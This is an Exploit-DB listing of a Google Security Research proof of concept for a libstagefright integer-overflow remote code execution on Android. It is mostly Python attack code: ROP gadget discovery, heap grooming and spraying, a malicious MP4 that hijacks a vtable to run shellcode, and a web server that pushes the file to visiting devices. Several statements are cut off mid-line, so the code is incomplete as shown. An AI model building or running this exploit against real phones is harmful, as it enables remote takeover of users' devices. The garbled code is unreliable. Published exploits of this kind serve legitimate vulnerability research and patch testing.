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exploitdbGoogle Security ResearchEDB-ID:38226
HistorySep 17, 2015 - 12:00 a.m.

Google Android - libstagefright Integer Overflow Remote Code Execution

Google Security Research

AI Score





import cherrypy
import os
import pwnlib.asm as asm
import pwnlib.elf as elf
import sys
import struct

with open('shellcode.bin', 'rb') as tmp:
  shellcode =

while len(shellcode) % 4 != 0:
  shellcode += '\x00'

# heap grooming configuration
alloc_size = 0x20
groom_count = 0x4
spray_size = 0x100000
spray_count = 0x10

# address of the buffer we allocate for our shellcode
mmap_address = 0x90000000

# addresses that we need to predict
libc_base = 0xb6ebd000
spray_address = 0xb3000000

# ROP gadget addresses
stack_pivot = None
pop_pc = None
pop_r0_r1_r2_r3_pc = None
pop_r4_r5_r6_r7_pc = None
ldr_lr_bx_lr = None
ldr_lr_bx_lr_stack_pad = 0
mmap64 = None
memcpy = None

def find_arm_gadget(e, gadget):
  gadget_bytes = asm.asm(gadget, arch='arm')
  gadget_address = None
  for address in
    if address % 4 == 0:
      gadget_address = address
      if gadget_bytes ==, len(gadget_bytes)):
        print asm.disasm(gadget_bytes, vma=gadget_address, arch='arm')
  return gadget_address

def find_thumb_gadget(e, gadget):
  gadget_bytes = asm.asm(gadget, arch='thumb')
  gadget_address = None
  for address in
    if address % 2 == 0:
      gadget_address = address + 1
      if gadget_bytes == - 1, len(gadget_bytes)):
        print asm.disasm(gadget_bytes, vma=gadget_address-1, arch='thumb')
  return gadget_address
def find_gadget(e, gadget):
  gadget_address = find_thumb_gadget(e, gadget)
  if gadget_address is not None:
    return gadget_address
  return find_arm_gadget(e, gadget)

def find_rop_gadgets(path):
  global memcpy
  global mmap64
  global stack_pivot
  global pop_pc
  global pop_r0_r1_r2_r3_pc
  global pop_r4_r5_r6_r7_pc
  global ldr_lr_bx_lr
  global ldr_lr_bx_lr_stack_pad

  e = elf.ELF(path)
  e.address = libc_base

  memcpy = e.symbols['memcpy']
  print '[*] memcpy : 0x{:08x}'.format(memcpy)
  mmap64 = e.symbols['mmap64']
  print '[*] mmap64 : 0x{:08x}'.format(mmap64)

  # .text:00013344    ADD             R2, R0, #0x4C
  # .text:00013348    LDMIA           R2, {R4-LR}
  # .text:0001334C    TEQ             SP, #0
  # .text:00013350    TEQNE           LR, #0
  # .text:00013354    BEQ             botch_0
  # .text:00013358    MOV             R0, R1
  # .text:0001335C    TEQ             R0, #0
  # .text:00013360    MOVEQ           R0, #1
  # .text:00013364    BX              LR

  pivot_asm = ''
  pivot_asm += 'add   r2, r0, #0x4c\n'
  pivot_asm += 'ldmia r2, {r4 - lr}\n'
  pivot_asm += 'teq   sp, #0\n'
  pivot_asm += 'teqne lr, #0'
  stack_pivot = find_arm_gadget(e, pivot_asm)
  print '[*] stack_pivot : 0x{:08x}'.format(stack_pivot)

  pop_pc_asm = 'pop {pc}'
  pop_pc = find_gadget(e, pop_pc_asm)
  print '[*] pop_pc : 0x{:08x}'.format(pop_pc)

  pop_r0_r1_r2_r3_pc = find_gadget(e, 'pop {r0, r1, r2, r3, pc}')
  print '[*] pop_r0_r1_r2_r3_pc : 0x{:08x}'.format(pop_r0_r1_r2_r3_pc)

  pop_r4_r5_r6_r7_pc = find_gadget(e, 'pop {r4, r5, r6, r7, pc}')
  print '[*] pop_r4_r5_r6_r7_pc : 0x{:08x}'.format(pop_r4_r5_r6_r7_pc)

  ldr_lr_bx_lr_stack_pad = 0
  for i in range(0, 0x100, 4):
    ldr_lr_bx_lr_asm =  'ldr lr, [sp, #0x{:08x}]\n'.format(i)
    ldr_lr_bx_lr_asm += 'add sp, sp, #0x{:08x}\n'.format(i + 8)
    ldr_lr_bx_lr_asm += 'bx  lr'
    ldr_lr_bx_lr = find_gadget(e, ldr_lr_bx_lr_asm)
    if ldr_lr_bx_lr is not None:
      ldr_lr_bx_lr_stack_pad = i
def pad(size):
  return '#' * size

def pb32(val):
  return struct.pack(">I", val)

def pb64(val):
  return struct.pack(">Q", val)

def p32(val):
  return struct.pack("<I", val)

def p64(val):
  return struct.pack("<Q", val)

def chunk(tag, data, length=0):
  if length == 0:
    length = len(data) + 8
  if length > 0xffffffff:
    return pb32(1) + tag + pb64(length)+ data
  return pb32(length) + tag + data

def alloc_avcc(size):
  avcc = 'A' * size
  return chunk('avcC', avcc)

def alloc_hvcc(size):
  hvcc = 'H' * size
  return chunk('hvcC', hvcc)

def sample_table(data):
  stbl = ''
  stbl += chunk('stco', '\x00' * 8)
  stbl += chunk('stsc', '\x00' * 8)
  stbl += chunk('stsz', '\x00' * 12)
  stbl += chunk('stts', '\x00' * 8)
  stbl += data
  return chunk('stbl', stbl)

def memory_leak(size):
  pssh = 'leak'
  pssh += 'L' * 16
  pssh += pb32(size)
  pssh += 'L' * size
  return chunk('pssh', pssh)

def heap_spray(size):
  pssh = 'spry'
  pssh += 'S' * 16
  pssh += pb32(size)

  page = ''

  nop = asm.asm('nop', arch='thumb')
  while len(page) < 0x100:
    page += nop
  page += shellcode
  while len(page) < 0xed0:
    page += '\xcc'

  # MPEG4DataSource fake vtable
  page += p32(stack_pivot)

  # pivot swaps stack then returns to pop {pc}
  page += p32(pop_r0_r1_r2_r3_pc)

  # mmap64(mmap_address, 
  #        0x1000,
  #        -1,
  #        0);

  page += p32(mmap_address)             # r0 = address
  page += p32(0x1000)                   # r1 = size
  page += p32(7)                        # r2 = protection
  page += p32(0x32)                     # r3 = flags
  page += p32(ldr_lr_bx_lr)             # pc

  page += pad(ldr_lr_bx_lr_stack_pad)
  page += p32(pop_r4_r5_r6_r7_pc)       # lr
  page += pad(4)

  page += p32(0x44444444)               # r4
  page += p32(0x55555555)               # r5
  page += p32(0x66666666)               # r6
  page += p32(0x77777777)               # r7
  page += p32(mmap64)                   # pc

  page += p32(0xffffffff)               # fd      (and then r4)
  page += pad(4)                        # padding (and then r5)
  page += p64(0)                        # offset  (and then r6, r7)
  page += p32(pop_r0_r1_r2_r3_pc)       # pc

  # memcpy(shellcode_address, 
  #        spray_address + len(rop_stack),
  #        len(shellcode));

  page += p32(mmap_address)             # r0 = dst
  page += p32(spray_address - 0xed0)    # r1 = src
  page += p32(0xed0)                    # r2 = size
  page += p32(0x33333333)               # r3
  page += p32(ldr_lr_bx_lr)             # pc

  page += pad(ldr_lr_bx_lr_stack_pad)
  page += p32(pop_r4_r5_r6_r7_pc)       # lr
  page += pad(4)

  page += p32(0x44444444)               # r4
  page += p32(0x55555555)               # r5
  page += p32(0x66666666)               # r6
  page += p32(0x77777777)               # r7
  page += p32(memcpy)                   # pc

  page += p32(0x44444444)               # r4
  page += p32(0x55555555)               # r5
  page += p32(0x66666666)               # r6
  page += p32(0x77777777)               # r7
  page += p32(mmap_address + 1)         # pc

  while len(page) < 0x1000:
    page += '#'

  pssh += page * (size // 0x1000)

  return chunk('pssh', pssh)

def exploit_mp4():
  ftyp = chunk("ftyp","69736f6d0000000169736f6d".decode("hex"))

  trak = ''

  # heap spray so we have somewhere to land our corrupted vtable 
  # pointer

  # yes, we wrap this in a sample_table for a reason; the 
  # NuCachedSource we will be using otherwise triggers calls to mmap,
  # leaving our large allocations non-contiguous and making our chance
  # of failure pretty high. wrapping in a sample_table means that we
  # wrap the NuCachedSource with an MPEG4Source, making a single 
  # allocation that caches all the data, doubling our heap spray 
  # effectiveness :-)
  trak += sample_table(heap_spray(spray_size) * spray_count)

  # heap groom for our MPEG4DataSource corruption

  # get the default size allocations for our MetaData::typed_data 
  # groom allocations out of the way first, by allocating small blocks
  # instead.
  trak += alloc_avcc(8)
  trak += alloc_hvcc(8)

  # we allocate the initial tx3g chunk here; we'll use the integer 
  # overflow so that the allocated buffer later is smaller than the 
  # original size of this chunk, then overflow all of the following 
  # MPEG4DataSource object and the following pssh allocation; hence why
  # we will need the extra groom allocation (so we don't overwrite 
  # anything sensitive...)

  # | tx3g | MPEG4DataSource | pssh |
  overflow = 'A' * 24

  # | tx3g ----------------> | pssh |
  overflow += p32(spray_address)         # MPEG4DataSource vtable ptr
  overflow += '0' * 0x48
  overflow += '0000'                    # r4
  overflow += '0000'                    # r5
  overflow += '0000'                    # r6
  overflow += '0000'                    # r7
  overflow += '0000'                    # r8
  overflow += '0000'                    # r9
  overflow += '0000'                    # r10
  overflow += '0000'                    # r11
  overflow += '0000'                    # r12
  overflow += p32(spray_address + 0x20) # sp
  overflow += p32(pop_pc)               # lr

  trak += chunk("tx3g", overflow)

  # defragment the for alloc_size blocks, then make our two
  # allocations. we end up with a spurious block in the middle, from
  # the temporary ABuffer deallocation.

  # | pssh | - | pssh |
  trak += memory_leak(alloc_size) * groom_count

  # | pssh | - | pssh | .... | avcC |
  trak += alloc_avcc(alloc_size)

  # | pssh | - | pssh | .... | avcC | hvcC |
  trak += alloc_hvcc(alloc_size)

  # | pssh | - | pssh | pssh | avcC | hvcC | pssh |
  trak += memory_leak(alloc_size) * 8

  # | pssh | - | pssh | pssh | avcC | .... |
  trak += alloc_hvcc(alloc_size * 2)

  # entering the stbl chunk triggers allocation of an MPEG4DataSource
  # object

  # | pssh | - | pssh | pssh | avcC | MPEG4DataSource | pssh |
  stbl = ''

  # | pssh | - | pssh | pssh | .... | MPEG4DataSource | pssh |
  stbl += alloc_avcc(alloc_size * 2)

  # | pssh | - | pssh | pssh | tx3g | MPEG4DataSource | pssh |
  # | pssh | - | pssh | pssh | tx3g ----------------> |
  overflow_length = (-(len(overflow) - 24) & 0xffffffffffffffff)
  stbl += chunk("tx3g", '', length = overflow_length)

  trak += chunk('stbl', stbl)

  return ftyp + chunk('trak', trak)

index_page = '''
<!DOCTYPE html>
    window.setTimeout('location.reload(true);', 4000);
    <iframe src='/exploit.mp4'></iframe>

class ExploitServer(object):

  exploit_file = None
  exploit_count = 0

  def index(self):
    self.exploit_count += 1
    print '*' * 80
    print 'exploit attempt: ' + str(self.exploit_count)
    print '*' * 80
    return index_page

  def exploit(self):
    cherrypy.response.headers['Content-Type'] = 'video/mp4'
    cherrypy.response.headers['Content-Encoding'] = 'gzip'

    if self.exploit_file is None:
      exploit_uncompressed = exploit_mp4()
      with open('exploit_uncompressed.mp4', 'wb') as tmp:
      os.system('gzip exploit_uncompressed.mp4')
      with open('exploit_uncompressed.mp4.gz', 'rb') as tmp:
        self.exploit_file =
      os.system('rm exploit_uncompressed.mp4.gz')

    return self.exploit_file

def main():
  with open('exploit.mp4', 'wb') as tmp:

if __name__ == '__main__':